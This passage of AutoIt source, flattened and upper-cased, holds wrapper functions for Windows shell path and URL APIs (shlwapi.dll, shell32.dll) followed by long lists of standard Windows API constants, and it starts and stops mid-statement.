, "wstr" , $SPATHFROM , "dword" , $BDIRFROM , "wstr" , $SPATHTO , "dword" , $BDIRTO ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHREMOVEARGS ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "none" , "PathRemoveArgsW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHREMOVEBACKSLASH ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "ptr" , "PathRemoveBackslashW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHREMOVEEXTENSION ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "none" , "PathRemoveExtensionW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHREMOVEFILESPEC ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathRemoveFileSpecW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN SETEXTENDED ($ARET [0 ] , $ARET [1 ] ) ENDFUNC FUNC _WINAPI_PATHRENAMEEXTENSION ($SFILEPATH , $SEXT ) LOCAL $TPATH = DLLSTRUCTCREATE ("wchar[260]" ) DLLSTRUCTSETDATA ($TPATH , 1 , $SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathRenameExtensionW" , "struct*" , $TPATH , "wstr" , $SEXT ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN DLLSTRUCTGETDATA ($TPATH , 1 ) ENDFUNC FUNC _WINAPI_PATHSEARCHANDQUALIFY ($SFILEPATH , $BEXISTS = FALSE ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathSearchAndQualifyW" , "wstr" , $SFILEPATH , "wstr" , "" , "int" , 4096 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) IF $BEXISTS AND NOT FILEEXISTS ($ARET [2 ] ) THEN RETURN SETERROR (20 , 0 , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_PATHSKIPROOT ($SFILEPATH ) LOCAL $TPATH = DLLSTRUCTCREATE ("wchar[" & (STRINGLEN ($SFILEPATH ) + 1 ) & "]" ) DLLSTRUCTSETDATA ($TPATH , 1 , $SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "ptr" , "PathSkipRootW" , "struct*" , $TPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF NOT $ARET [0 ] THEN RETURN $SFILEPATH RETURN _WINAPI_GETSTRING ($ARET [0 ] ) ENDFUNC FUNC _WINAPI_PATHSTRIPPATH ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "none" , "PathStripPathW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHSTRIPTOROOT ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathStripToRootW" , "wstr" , $SFILEPATH ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHUNDECORATE ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "none" , "PathUndecorateW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHUNEXPANDENVSTRINGS ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathUnExpandEnvStringsW" , "wstr" , $SFILEPATH , "wstr" , "" , "uint" , 4096 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_PATHUNMAKESYSTEMFOLDER ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "PathUnmakeSystemFolderW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_PATHUNQUOTESPACES ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "none" , "PathUnquoteSpacesW" , "wstr" , $SFILEPATH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_PATHYETANOTHERMAKEUNIQUENAME ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "PathYetAnotherMakeUniqueName" , "wstr" , "" , "wstr" , $SFILEPATH , "ptr" , 0 , "ptr" , 0 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN $ARET [1 ] ENDFUNC FUNC _WINAPI_SHELLGETIMAGELIST ($BSMALL = FALSE ) LOCAL $PLARGE , $PSMALL , $TPTR = DLLSTRUCTCREATE ("ptr" ) IF $BSMALL THEN $PLARGE = 0 $PSMALL = DLLSTRUCTGETPTR ($TPTR ) ELSE $PLARGE = DLLSTRUCTGETPTR ($TPTR ) $PSMALL = 0 ENDIF LOCAL $ARET = DLLCALL ("shell32.dll" , "int" , "Shell_GetImageLists" , "ptr" , $PLARGE , "ptr" , $PSMALL ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TPTR , 1 ) ENDFUNC FUNC _WINAPI_URLAPPLYSCHEME ($SURL , $IFLAGS = 1 ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "long" , "UrlApplySchemeW" , "wstr" , $SURL , "wstr" , "" , "dword*" , 4096 , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_URLCANONICALIZE ($SURL , $IFLAGS ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "long" , "UrlCanonicalizeW" , "wstr" , $SURL , "wstr" , "" , "dword*" , 4096 , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_URLCOMBINE ($SURL , $SPART , $IFLAGS = 0 ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "long" , "UrlCombineW" , "wstr" , $SURL , "wstr" , $SPART , "wstr" , "" , "dword*" , 4096 , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) RETURN $ARET [3 ] ENDFUNC FUNC _WINAPI_URLCOMPARE ($SURL1 , $SURL2 , $BIGNORESLASH = FALSE ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "int" , "UrlCompareW" , "wstr" , $SURL1 , "wstr" , $SURL2 , "bool" , $BIGNORESLASH ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_URLCREATEFROMPATH ($SFILEPATH ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "long" , "UrlCreateFromPathW" , "wstr" , $SFILEPATH , "wstr" , "" , "dword*" , 4096 , "dword" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] < 0 OR $ARET [0 ] > 1 THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) ENDIF RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_URLFIXUP ($SURL ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "long" , "UrlFixupW" , "wstr" , $SURL , "wstr" , "" , "dword" , 4096 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_URLGETPART ($SURL , $IPART ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "long" , "UrlGetPartW" , "wstr" , $SURL , "wstr" , "" , "dword*" , 4096 , "dword" , $IPART , "dword" , 0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_URLHASH ($SURL , $ILENGTH = 32 ) IF $ILENGTH <= 0 OR $ILENGTH > 256 THEN RETURN SETERROR (256 , 0 , 0 ) LOCAL $TDATA = DLLSTRUCTCREATE ("byte[" & $ILENGTH & "]" ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "long" , "UrlHashW" , "wstr" , $SURL , "struct*" , $TDATA , "dword" , $ILENGTH ) IF @ERROR THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) IF $ARET [0 ] THEN RETURN SETERROR (10 , $ARET [0 ] , 0 ) RETURN DLLSTRUCTGETDATA ($TDATA , 1 ) ENDFUNC FUNC _WINAPI_URLIS ($SURL , $ITYPE = 0 ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "bool" , "UrlIsW" , "wstr" , $SURL , "uint" , $ITYPE ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC #EndRegion Public Functions #Region Internal Functions FUNC __US ($SSTRING , $ILENGTH = 0 ) IF $ILENGTH THEN $SSTRING = STRINGLEFT ($SSTRING , $ILENGTH ) ELSE $ILENGTH = STRINGLEN ($SSTRING ) ENDIF LOCAL $TUS = DLLSTRUCTCREATE ("ushort;ushort;ptr;wchar[" & ($ILENGTH + 1 ) & "]" ) DLLSTRUCTSETDATA ($TUS , 1 , 2 * STRINGLEN ($SSTRING ) ) DLLSTRUCTSETDATA ($TUS , 2 , 2 * $ILENGTH ) DLLSTRUCTSETDATA ($TUS , 3 , DLLSTRUCTGETPTR ($TUS , 4 ) ) DLLSTRUCTSETDATA ($TUS , 4 , $SSTRING ) RETURN $TUS ENDFUNC #EndRegion Internal Functions GLOBAL CONST $KLF_ACTIVATE = 1 GLOBAL CONST $KLF_NOTELLSHELL = 128 GLOBAL CONST $KLF_REORDER = 8 GLOBAL CONST $KLF_REPLACELANG = 16 GLOBAL CONST $KLF_RESET = 1073741824 GLOBAL CONST $KLF_SETFORPROCESS = 256 GLOBAL CONST $KLF_SHIFTLOCK = 65536 GLOBAL CONST $KLF_SUBSTITUTE_OK = 2 GLOBAL CONST $HKL_NEXT = 1 GLOBAL CONST $HKL_PREV = 0 GLOBAL CONST $AW_ACTIVATE = 131072 GLOBAL CONST $AW_BLEND = 524288 GLOBAL CONST $AW_CENTER = 16 GLOBAL CONST $AW_HIDE = 65536 GLOBAL CONST $AW_HOR_NEGATIVE = 2 GLOBAL CONST $AW_HOR_POSITIVE = 1 GLOBAL CONST $AW_SLIDE = 262144 GLOBAL CONST $AW_VER_NEGATIVE = 8 GLOBAL CONST $AW_VER_POSITIVE = 4 GLOBAL CONST $BSF_ALLOWSFW = 128 GLOBAL CONST $BSF_FLUSHDISK = 4 GLOBAL CONST $BSF_FORCEIFHUNG = 32 GLOBAL CONST $BSF_IGNORECURRENTTASK = 2 GLOBAL CONST $BSF_NOHANG = 8 GLOBAL CONST $BSF_NOTIMEOUTIFNOTHUNG = 64 GLOBAL CONST $BSF_POSTMESSAGE = 16 GLOBAL CONST $BSF_QUERY = 1 GLOBAL CONST $BSF_SENDNOTIFYMESSAGE = 256 GLOBAL CONST $BSM_ALLCOMPONENTS = 0 GLOBAL CONST $BSM_ALLDESKTOPS = 8 GLOBAL CONST $BSM_APPLICATIONS = 16 GLOBAL CONST $BSM_INSTALLABLEDRIVERS = 4 GLOBAL CONST $BSM_NETDRIVER = 2 GLOBAL CONST $BSM_VXDS = 1 GLOBAL CONST $MDITILE_HORIZONTAL = 1 GLOBAL CONST $MDITILE_SKIPDISABLED = 2 GLOBAL CONST $MDITILE_VERTICAL = 0 GLOBAL CONST $MDITILE_ZORDER = 4 GLOBAL CONST $MSGFLT_ALLOW = 1 GLOBAL CONST $MSGFLT_DISALLOW = 2 GLOBAL CONST $MSGFLT_RESET = 0 GLOBAL CONST $MSGFLTINFO_ALLOWED_HIGHER = 3 GLOBAL CONST $MSGFLTINFO_ALREADYALLOWED_FORWND = 1 GLOBAL CONST $MSGFLTINFO_ALREADYDISALLOWED_FORWND = 2 GLOBAL CONST $MSGFLTINFO_NONE = 0 GLOBAL CONST $CWP_ALL = 0 GLOBAL CONST $CWP_SKIPINVISIBLE = 1 GLOBAL CONST $CWP_SKIPDISABLED = 2 GLOBAL CONST $CWP_SKIPTRANSPARENT = 4 GLOBAL CONST $COMPRESSION_FORMAT_NONE = 0 GLOBAL CONST $COMPRESSION_FORMAT_DEFAULT = 1 GLOBAL CONST $COMPRESSION_FORMAT_LZNT1 = 2 GLOBAL CONST $COMPRESSION_FORMAT_XPRESS = 3 GLOBAL CONST $COMPRESSION_FORMAT_XPRESS_HUFF = 4 GLOBAL CONST $COMPRESSION_ENGINE_STANDARD = 0 GLOBAL CONST $COMPRESSION_ENGINE_MAXIMUM = 256 GLOBAL CONST $COMPRESSION_ENGINE_HIBER = 512 GLOBAL CONST $WINSTA_ACCESSCLIPBOARD = 4 GLOBAL CONST $WINSTA_ACCESSGLOBALATOMS = 32 GLOBAL CONST $WINSTA_CREATEDESKTOP = 8 GLOBAL CONST $WINSTA_ENUMDESKTOPS = 1 GLOBAL CONST $WINSTA_ENUMERATE = 256 GLOBAL CONST $WINSTA_EXITWINDOWS = 64 GLOBAL CONST $WINSTA_READATTRIBUTES = 2 GLOBAL CONST $WINSTA_READSCREEN = 512 GLOBAL CONST $WINSTA_WRITEATTRIBUTES = 16 GLOBAL CONST $WINSTA_ALL_ACCESS = BITOR ($WINSTA_ACCESSCLIPBOARD , $WINSTA_ACCESSGLOBALATOMS , $WINSTA_CREATEDESKTOP , $WINSTA_ENUMDESKTOPS , $WINSTA_ENUMERATE , $WINSTA_EXITWINDOWS , $WINSTA_READATTRIBUTES , $WINSTA_READSCREEN , $WINSTA_WRITEATTRIBUTES ) GLOBAL CONST $CWF_CREATE_ONLY = 1 GLOBAL CONST $GCL_CBCLSEXTRA = + 4294967276 GLOBAL CONST $GCL_CBWNDEXTRA = + 4294967278 GLOBAL CONST $GCL_HBRBACKGROUND = + 4294967286 GLOBAL CONST $GCL_HCURSOR = + 4294967284 GLOBAL CONST $GCL_HICON = + 4294967282 GLOBAL CONST $GCL_HICONSM = + 4294967262 GLOBAL CONST $GCL_HMODULE = + 4294967280 GLOBAL CONST $GCL_MENUNAME = + 4294967288 GLOBAL CONST $GCL_STYLE = + 4294967270 GLOBAL CONST $GCL_WNDPROC = + 4294967272 GLOBAL CONST $DOCKINFO_DOCKED = 2 GLOBAL CONST $DOCKINFO_UNDOCKED = 1 GLOBAL CONST $DOCKINFO_USER_SUPPLIED = 4 GLOBAL CONST $DOCKINFO_USER_DOCKED = 5 GLOBAL CONST $DOCKINFO_USER_UNDOCKED = 6 GLOBAL CONST $GUI_CARETBLINKING = 1 GLOBAL CONST $GUI_INMENUMODE = 4 GLOBAL CONST $GUI_INMOVESIZE = 2 GLOBAL CONST $GUI_POPUPMENUMODE = 16 GLOBAL CONST $GUI_SYSTEMMENUMODE = 8 GLOBAL CONST $HANDLE_FLAG_INHERIT = 1 GLOBAL CONST $HANDLE_FLAG_PROTECT_FROM_CLOSE = 2 GLOBAL CONST $GET_MODULE_HANDLE_EX_FLAG_FROM_ADDRESS = 4 GLOBAL CONST $GET_MODULE_HANDLE_EX_FLAG_PIN = 1 GLOBAL CONST $GET_MODULE_HANDLE_EX_FLAG_UNCHANGED_REFCOUNT = 2 GLOBAL CONST $GET_MODULE_HANDLE_EX_FLAG_DEFAULT = 0 GLOBAL CONST $PROCESSOR_ARCHITECTURE_AMD64 = 9 GLOBAL CONST $PROCESSOR_ARCHITECTURE_IA64 = 6 GLOBAL CONST $PROCESSOR_ARCHITECTURE_INTEL = 0 GLOBAL CONST $PROCESSOR_ARCHITECTURE_UNKNOWN = 65535 GLOBAL CONST $PROCESSOR_INTEL_386 = 386 GLOBAL CONST $PROCESSOR_INTEL_486 = 486 GLOBAL CONST $PROCESSOR_INTEL_PENTIUM = 586 GLOBAL CONST $PROCESSOR_INTEL_IA64 = 2200 GLOBAL CONST $PROCESSOR_AMD_X8664 = 8664 GLOBAL CONST $UOI_FLAGS = 1 GLOBAL CONST $UOI_HEAPSIZE = 5 GLOBAL CONST $UOI_IO = 6 GLOBAL CONST $UOI_NAME = 2 GLOBAL CONST $UOI_TYPE = 3 GLOBAL CONST $UOI_USER_SID = 4 GLOBAL CONST $DF_ALLOWOTHERACCOUNTHOOK = 1 GLOBAL CONST $WSF_VISIBLE = 1 GLOBAL CONST $VER_SUITE_BACKOFFICE = 4 GLOBAL CONST $VER_SUITE_BLADE = 1024 GLOBAL CONST $VER_SUITE_COMPUTE_SERVER = 16384 GLOBAL CONST $VER_SUITE_DATACENTER = 128 GLOBAL CONST $VER_SUITE_ENTERPRISE = 2 GLOBAL CONST $VER_SUITE_EMBEDDEDNT = 64 GLOBAL CONST $VER_SUITE_PERSONAL = 512 GLOBAL CONST $VER_SUITE_SINGLEUSERTS = 256 GLOBAL CONST $VER_SUITE_SMALLBUSINESS = 1 GLOBAL CONST $VER_SUITE_SMALLBUSINESS_RESTRICTED = 32 GLOBAL CONST $VER_SUITE_STORAGE_SERVER = 8192 GLOBAL CONST $VER_SUITE_TERMINAL = 16 GLOBAL CONST $VER_SUITE_WH_SERVER = 32768 GLOBAL CONST $VER_NT_DOMAIN_CONTROLLER = 2 GLOBAL CONST $VER_NT_SERVER = 3 GLOBAL CONST $VER_NT_WORKSTATION = 1 GLOBAL CONST $WDA_MONITOR = 1 GLOBAL CONST $WDA_NONE = 0 GLOBAL CONST $PF_3DNOW_INSTRUCTIONS_AVAILABLE = 7 GLOBAL CONST $PF_CHANNELS_ENABLED = 16 GLOBAL CONST $PF_COMPARE_EXCHANGE_DOUBLE = 2 GLOBAL CONST $PF_COMPARE_EXCHANGE128 = 14 GLOBAL CONST $PF_COMPARE64_EXCHANGE128 = 15 GLOBAL CONST $PF_FLOATING_POINT_EMULATED = 1 GLOBAL CONST $PF_FLOATING_POINT_PRECISION_ERRATA = 0 GLOBAL CONST $PF_MMX_INSTRUCTIONS_AVAILABLE = 3 GLOBAL CONST $PF_NX_ENABLED = 12 GLOBAL CONST $PF_PAE_ENABLED = 9 GLOBAL CONST $PF_RDTSC_INSTRUCTION_AVAILABLE = 8 GLOBAL CONST $PF_SSE3_INSTRUCTIONS_AVAILABLE = 13 GLOBAL CONST $PF_XMMI_INSTRUCTIONS_AVAILABLE = 6 GLOBAL CONST $PF_XMMI64_INSTRUCTIONS_AVAILABLE = 10 GLOBAL CONST $PF_XSAVE_ENABLED = 17 GLOBAL CONST $KEYEVENTF_EXTENDEDKEY = 1 GLOBAL CONST $KEYEVENTF_KEYUP = 2 GLOBAL CONST $LIM_SMALL = 0 GLOBAL CONST $LIM_LARGE = 1 GLOBAL CONST $MAPVK_VK_TO_CHAR = 2 GLOBAL CONST $MAPVK_VK_TO_VSC = 0 GLOBAL CONST $MAPVK_VK_TO_VSC_EX = 4 GLOBAL CONST $MAPVK_VSC_TO_VK = 1 GLOBAL CONST $MAPVK_VSC_TO_VK_EX = 3 GLOBAL CONST $MOD_ALT = 1 GLOBAL CONST $MOD_CONTROL = 2 GLOBAL CONST $MOD_NOREPEAT = 16384 GLOBAL CONST $MOD_SHIFT = 4 GLOBAL CONST $MOD_WIN = 8 GLOBAL CONST $GUID_ACDC_POWER_SOURCE = "{5D3E9A59-E9D5-4B00-A6BD-FF34FF516548}" GLOBAL CONST $GUID_BATTERY_PERCENTAGE_REMAINING = "{A7AD8041-B45A-4CAE-87A3-EECBB468A9E1}" GLOBAL CONST $GUID_IDLE_BACKGROUND_TASK = "{515C31D8-F734-163D-A0FD-11A08C91E8F1}" GLOBAL CONST $GUID_MONITOR_POWER_ON = "{02731015-4510-4526-99E6-E5A17EBD1AEA}" GLOBAL CONST $GUID_POWERSCHEME_PERSONALITY = "{245D8541-3943-4422-B025-13A784F679B7}" GLOBAL CONST $GUID_SYSTEM_AWAYMODE = "{98A7F580-01F7-48AA-9C0F-44352C29E5C0}" GLOBAL CONST $GUID_MIN_POWER_SAVINGS = "{8C5E7FDA-E8BF-4A96-9A85-A6E23A8C635C}" GLOBAL CONST $GUID_MAX_POWER_SAVINGS = "{A1841308-3541-4FAB-BC81-F71556F20B4A}" GLOBAL CONST $GUID_TYPICAL_POWER_SAVINGS = "{381B4222-F694-41F0-9685-FF5BB260DF2E}" GLOBAL CONST $HSHELL_WINDOWCREATED = 1 GLOBAL CONST $HSHELL_WINDOWDESTROYED = 2 GLOBAL CONST $HSHELL_ACTIVATESHELLWINDOW = 3 GLOBAL CONST $HSHELL_WINDOWACTIVATED = 4 GLOBAL CONST $HSHELL_GETMINRECT = 5 GLOBAL CONST $HSHELL_REDRAW = 6 GLOBAL CONST $HSHELL_TASKMAN = 7 GLOBAL CONST $HSHELL_LANGUAGE = 8 GLOBAL CONST $HSHELL_SYSMENU = 9 GLOBAL CONST $HSHELL_ENDTASK = 10 GLOBAL CONST $HSHELL_ACCESSIBILITYSTATE = 11 GLOBAL CONST $HSHELL_APPCOMMAND = 12 GLOBAL CONST $HSHELL_WINDOWREPLACED = 13 GLOBAL CONST $HSHELL_WINDOWREPLACING = 14 GLOBAL CONST $HSHELL_RUDEAPPACTIVATED = 32772 GLOBAL CONST $HSHELL_FLASH = 32774 GLOBAL CONST $HWND_BROADCAST = 65535 GLOBAL CONST $SMTO_BLOCK = 1 GLOBAL CONST $SMTO_NORMAL = 0 GLOBAL CONST $SMTO_ABORTIFHUNG = 2 GLOBAL CONST $SMTO_NOTIMEOUTIFNOTHUNG = 8 GLOBAL CONST $SMTO_ERRORONEXIT = 32 GLOBAL CONST $INPUTLANGCHANGE_BACKWARD = 4 GLOBAL CONST $INPUTLANGCHANGE_FORWARD = 2 GLOBAL CONST $INPUTLANGCHANGE_SYSCHARSET = 1 GLOBAL CONST $EVENT_MIN = 1 GLOBAL CONST $EVENT_SYSTEM_SOUND = 1 GLOBAL CONST $EVENT_SYSTEM_ALERT = 2 GLOBAL CONST $EVENT_SYSTEM_FOREGROUND = 3 GLOBAL CONST $EVENT_SYSTEM_MENUSTART = 4 GLOBAL CONST $EVENT_SYSTEM_MENUEND = 5 GLOBAL CONST $EVENT_SYSTEM_MENUPOPUPSTART = 6 GLOBAL CONST $EVENT_SYSTEM_MENUPOPUPEND = 7 GLOBAL CONST $EVENT_SYSTEM_CAPTURESTART = 8 GLOBAL CONST $EVENT_SYSTEM_CAPTUREEND = 9 GLOBAL CONST $EVENT_SYSTEM_MOVESIZESTART = 10 GLOBAL CONST $EVENT_SYSTEM_MOVESIZEEND = 11 GLOBAL CONST $EVENT_SYSTEM_CONTEXTHELPSTART = 12 GLOBAL CONST $EVENT_SYSTEM_CONTEXTHELPEND = 13 GLOBAL CONST $EVENT_SYSTEM_DRAGDROPSTART = 14 GLOBAL CONST $EVENT_SYSTEM_DRAGDROPEND = 15 GLOBAL CONST $EVENT_SYSTEM_DIALOGSTART = 16 GLOBAL CONST $EVENT_SYSTEM_DIALOGEND = 17 GLOBAL CONST $EVENT_SYSTEM_SCROLLINGSTART = 18 GLOBAL CONST $EVENT_SYSTEM_SCROLLINGEND = 19 GLOBAL CONST $EVENT_SYSTEM_SWITCHSTART = 20 GLOBAL CONST $EVENT_SYSTEM_SWITCHEND = 21 GLOBAL CONST $EVENT_SYSTEM_MINIMIZESTART = 22 GLOBAL CONST $EVENT_SYSTEM_MINIMIZEEND = 23 GLOBAL CONST $EVENT_SYSTEM_DESKTOPSWITCH = 32 GLOBAL CONST $EVENT_OBJECT_CREATE = 32768 GLOBAL CONST $EVENT_OBJECT_DESTROY = 32769 GLOBAL CONST $EVENT_OBJECT_SHOW = 32770 GLOBAL CONST $EVENT_OBJECT_HIDE = 32771 GLOBAL CONST $EVENT_OBJECT_REORDER = 32772 GLOBAL CONST $EVENT_OBJECT_FOCUS = 32773 GLOBAL CONST $EVENT_OBJECT_SELECTION = 32774 GLOBAL CONST $EVENT_OBJECT_SELECTIONADD = 32775 GLOBAL CONST $EVENT_OBJECT_SELECTIONREMOVE = 32776 GLOBAL CONST $EVENT_OBJECT_SELECTIONWITHIN = 32777 GLOBAL CONST $EVENT_OBJECT_STATECHANGE = 32778 GLOBAL CONST $EVENT_OBJECT_LOCATIONCHANGE = 32779 GLOBAL CONST $EVENT_OBJECT_NAMECHANGE = 32780 GLOBAL CONST $EVENT_OBJECT_DESCRIPTIONCHANGE = 32781 GLOBAL CONST $EVENT_OBJECT_VALUECHANGE = 32782 GLOBAL CONST $EVENT_OBJECT_PARENTCHANGE = 32783 GLOBAL CONST $EVENT_OBJECT_HELPCHANGE = 32784 GLOBAL CONST $EVENT_OBJECT_DEFACTIONCHANGE = 32785 GLOBAL CONST $EVENT_OBJECT_ACCELERATORCHANGE = 32786 GLOBAL CONST $EVENT_OBJECT_INVOKED = 32787 GLOBAL CONST $EVENT_OBJECT_TEXTSELECTIONCHANGED = 32788 GLOBAL CONST $EVENT_OBJECT_CONTENTSCROLLED = 32789 GLOBAL CONST $EVENT_MAX = 2147483647 GLOBAL CONST $WINEVENT_INCONTEXT = 4 GLOBAL CONST $WINEVENT_OUTOFCONTEXT = 0 GLOBAL CONST $WINEVENT_SKIPOWNPROCESS = 2 GLOBAL CONST $WINEVENT_SKIPOWNTHREAD = 1 GLOBAL CONST $TME_CANCEL = 2147483648 GLOBAL CONST $TME_HOVER = 1 GLOBAL CONST $TME_LEAVE = 2 GLOBAL CONST $TME_NONCLIENT = 16 GLOBAL CONST $TME_QUERY = 1073741824 GLOBAL CONST $DESKTOP_CREATEMENU = 4 GLOBAL CONST $DESKTOP_CREATEWINDOW = 2 GLOBAL CONST $DESKTOP_ENUMERATE = 64 GLOBAL CONST $DESKTOP_HOOKCONTROL = 8 GLOBAL CONST $DESKTOP_JOURNALPLAYBACK = 32 GLOBAL CONST $DESKTOP_JOURNALRECORD = 16 GLOBAL CONST $DESKTOP_READOBJECTS = 1 GLOBAL CONST $DESKTOP_SWITCHDESKTOP = 256 GLOBAL CONST $DESKTOP_WRITEOBJECTS = 128 GLOBAL CONST $DESKTOP_ALL_ACCESS = BITOR ($DESKTOP_CREATEMENU , $DESKTOP_CREATEWINDOW , $DESKTOP_ENUMERATE , $DESKTOP_HOOKCONTROL , $DESKTOP_JOURNALPLAYBACK , $DESKTOP_JOURNALRECORD , $DESKTOP_READOBJECTS , $DESKTOP_SWITCHDESKTOP , $DESKTOP_WRITEOBJECTS ) GLOBAL CONST $RIDEV_APPKEYS = 1024 GLOBAL CONST $RIDEV_CAPTUREMOUSE = 512 GLOBAL CONST $RIDEV_DEVNOTIFY = 8192 GLOBAL CONST $RIDEV_EXCLUDE = 16 GLOBAL CONST $RIDEV_EXINPUTSINK = 4096 GLOBAL CONST $RIDEV_INPUTSINK = 256 GLOBAL CONST $RIDEV_NOHOTKEYS = 512 GLOBAL CONST $RIDEV_NOLEGACY = 48 GLOBAL CONST $RIDEV_PAGEONLY = 32 GLOBAL CONST $RIDEV_REMOVE = 1 GLOBAL CONST $RID_HEADER = 268435461 GLOBAL CONST $RID_INPUT = 268435459 GLOBAL CONST $RIM_TYPEHID = 2 GLOBAL CONST $RIM_TYPEKEYBOARD = 1 GLOBAL CONST $RIM_TYPEMOUSE = 0 GLOBAL CONST $RIDI_DEVICENAME = 536870919 GLOBAL CONST $RIDI_DEVICEINFO = 536870923 GLOBAL CONST $RIDI_PREPARSEDDATA = 536870917 GLOBAL CONST $MOUSE_ATTRIBUTES_CHANGED = 4 GLOBAL CONST $MOUSE_MOVE_ABSOLUTE = 1 GLOBAL CONST $MOUSE_MOVE_RELATIVE = 0 GLOBAL CONST $MOUSE_VIRTUAL_DESKTOP = 2 GLOBAL CONST $RI_MOUSE_LEFT_BUTTON_DOWN = 1 GLOBAL CONST $RI_MOUSE_LEFT_BUTTON_UP = 2 GLOBAL CONST $RI_MOUSE_MIDDLE_BUTTON_DOWN = 16 GLOBAL CONST $RI_MOUSE_MIDDLE_BUTTON_UP = 32 GLOBAL CONST $RI_MOUSE_RIGHT_BUTTON_DOWN = 4 GLOBAL CONST $RI_MOUSE_RIGHT_BUTTON_UP = 8 GLOBAL CONST $RI_MOUSE_BUTTON_1_DOWN = $RI_MOUSE_LEFT_BUTTON_DOWN GLOBAL CONST $RI_MOUSE_BUTTON_1_UP = $RI_MOUSE_LEFT_BUTTON_UP GLOBAL CONST 